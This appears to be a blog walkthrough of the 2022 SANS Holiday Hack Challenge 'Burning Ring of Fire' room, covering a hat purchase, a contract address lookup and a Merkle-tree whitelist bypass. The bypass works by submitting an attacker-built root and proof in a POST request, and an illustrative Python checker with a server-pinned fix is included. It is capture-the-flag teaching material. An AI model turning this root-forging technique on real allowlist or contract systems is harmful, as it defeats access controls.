Burning Ring of Fire

Burning Ring of Fire Room

Buy a Hat

For this challenge the first thing we need to do is select which hat we want to buy. We will pick the standard Santa hat. When we click on it we are shown the receiving account and the ID that will be used to validate our purchase. Each hat has its own account to receive the 10 Kringle Coins.

Santa Hat

The next step is to visit the KTM machine with this information and pre-approve this transfer.

Approve Transfer

Now we need to get back to the hat vending machine and make the purchase.

Purchasing the Hat
Confirmation of the purchase

BlockChain Divination

Question - Use the Blockchain Explorer in the Burning Ring of Fire to investigate the contracts and transactions on the chain. At what address is the KringleCoin smart contract deployed?

The answer for this challenge is on the second block of the blockchain.

Second block of the blockchain
Answer

0xc27A2D3DE339Ce353c0eFBa32e948a88F1C86554

Exploit a Smart Contract

In this challenge we are tasked with buying a Bored Sporc NFT, and to do it we need to be on a whitelist that is validated against a Merkle Tree. Initially (and for many hours) my plan was to find a flaw in the Merkle Tree implementation. After rewatching the video of Prof. Qwerty Petabyte a few times I understood that this would not be possible. His mention of publishing the code also got me to search the web for the Merkle Tree implementation, without success.

After many hours I decided to look for all the chests around the map, and one of them contained the link to the GitHub repo I was initially looking for.

Merkle Tree Implementation GitHub repo

At this point I had looked at all the information I had and still could not see how to exploit this and get myself validated as part of the whitelist. I then decided to look at the web page and the whitelist validation itself.

Post request to validate presale list
POST /cgi-bin/presale HTTP/2
Host: boredsporcrowboatsociety.com
Content-Length: 176
Sec-Ch-Ua: "Not?A_Brand";v="8", "Chromium";v="108"
Sec-Ch-Ua-Platform: "Windows"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.95 Safari/537.36
Content-Type: application/json
Accept: */*
Origin: https://boredsporcrowboatsociety.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://boredsporcrowboatsociety.com/presale.html?&challenge=bsrs&username=abc123bitly&id=c0b42020-f871-4edc-a844-ee67fc03b0e9&area=level5&location=4,15&tokens=
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

{"WalletID":"WalletID","Root":"0x52cfdfdcba8efebabd9ecc2c60e6f482ab30bdc6acf8f9bd0600de83701e15f1","Proof":"PROOF","Validate":"true","Session":"c0b42020-f871-4edc-a844-ee67fc03b0e9"}

Knowing the root node is not a weakness of the Merkle Tree structure, but letting us control it is. To exploit the smart contract we just need to provide a valid Merkle Tree, and we can do that because we control all the moving parts:

  • Root

  • WalletID

  • Proofs

To build the Merkle Tree we first need to clone the GitHub repo from QPetabyte. For that we run:

git clone https://github.com/QPetabyte/Merkle_Trees.git

The next step is to build the Docker image:

docker build -t merkletrees .

Once it is built we need to jump into the container:

docker run -it --rm --name=merkletrees merkletrees

Then we change the allowlist in merkle_tree.py so that it contains our Wallet ID address.

Original merkle_tree.py

Now that we have replaced one of the entries with our wallet ID, we just need to run the Python script to produce the root and proof we need.

Root + Proof for our Wallet ID
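The weakness described above, as an added example that is not part of this write-up or of QPetabyte's repo: a small Merkle tree in Python (SHA-256 is assumed as the hash, since the page does not show the real one, and the allowlist entries are constructed) with a checker that trusts the root sent in the request beside one that pins the root, showing that a tree rebuilt with an outsider's wallet, as done above with merkle_tree.py, passes only the first.

```python
import hashlib

def _h(data: bytes) -> bytes:
    # Assumption: SHA-256 stands in for whatever hash the real contract uses.
    return hashlib.sha256(data).digest()

def build_root_and_proof(entries, index):
    """Return the Merkle root of `entries` and the proof for entries[index].
    The proof is a list of (sibling_hash, sibling_is_left) pairs."""
    level = [_h(e) for e in entries]
    proof = []
    while len(level) > 1:
        if len(level) % 2:                      # odd level: duplicate the last node
            level.append(level[-1])
        sib = index ^ 1
        proof.append((level[sib], sib < index))
        level = [_h(level[i] + level[i + 1]) for i in range(0, len(level), 2)]
        index //= 2
    return level[0], proof

def verify(entry, proof, root):
    # Recompute the path from the leaf up to the root and compare.
    node = _h(entry)
    for sibling, sibling_is_left in proof:
        node = _h(sibling + node) if sibling_is_left else _h(node + sibling)
    return node == root

# Constructed sample allowlist; these are not real wallet addresses.
ALLOWLIST = [b"0xwallet-member-1", b"0xwallet-member-2", b"0xwallet-member-3"]
PINNED_ROOT, _ = build_root_and_proof(ALLOWLIST, 0)

def validate_trusting_client_root(wallet, proof, root):
    # Weak check: the root is taken from the request, as in the POST body above.
    return verify(wallet, proof, root)

def validate_with_pinned_root(wallet, proof):
    # Hardened check: the root is fixed server-side and never read from the request.
    return verify(wallet, proof, PINNED_ROOT)

def demo():
    outsider = b"0xwallet-not-on-list"
    # The outsider rebuilds the tree with their own address in place of a member,
    # as the write-up does in merkle_tree.py, and submits that root and proof.
    forged_root, forged_proof = build_root_and_proof(ALLOWLIST[:2] + [outsider], 2)
    _, member_proof = build_root_and_proof(ALLOWLIST, 1)
    return {
        "weak_accepts_outsider": validate_trusting_client_root(outsider, forged_proof, forged_root),
        "pinned_rejects_outsider": not validate_with_pinned_root(outsider, forged_proof),
        "pinned_accepts_member": validate_with_pinned_root(ALLOWLIST[1], member_proof),
    }
```

The fix for the site would be the second checker: keep the root on the server or contract and use only the wallet and proof from the request.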

Now that we have the details we just need to issue a request to validate we are part of the whitelist.

Request to validate we are part of the whitelist

Now, as we did for the hat, we need to pre-approve a transfer to 0xe8fC6f6a76BE243122E3d01A1c544F87f1264d3a, but this time of 100 Kringle Coins.

Pre-approved transfer for the Bored Sporc NFT

The last step is to remove the validate check in order to make the purchase.

Purchase of Bored Sporc NFT

Unfortunately I have not kept the original screenshot, but I got #11: https://boredsporcrowboatsociety.com/TOKENS/TOKENIMAGES/BSRS11.png

BSRS #000011

With this we reach the end of the 2022 SANS Holiday Hack Challenge. I had a lot of fun solving it. Thanks to Ed Skoudis and the whole team for this event!!
